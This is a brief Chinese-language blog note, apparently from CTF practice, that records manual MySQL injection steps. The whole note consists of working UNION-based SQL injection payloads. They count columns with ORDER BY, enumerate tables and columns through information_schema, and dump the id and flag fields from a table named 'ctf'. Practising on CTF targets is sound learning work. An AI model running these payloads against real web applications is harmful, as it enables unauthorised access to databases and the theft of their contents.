mysql 注入手工笔记

in 笔记 with 0 comment

查字段

order by 1,2,3,4,5 %23

爆出所有的表

union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() %23

爆出ctf(0x637466)表字段

union select 1,group_concat(column_name) from information_schema.columns where table_name=0x637466 %23

爆出内容

union select 1,group_concat(id,flag) from ctf %23
Responses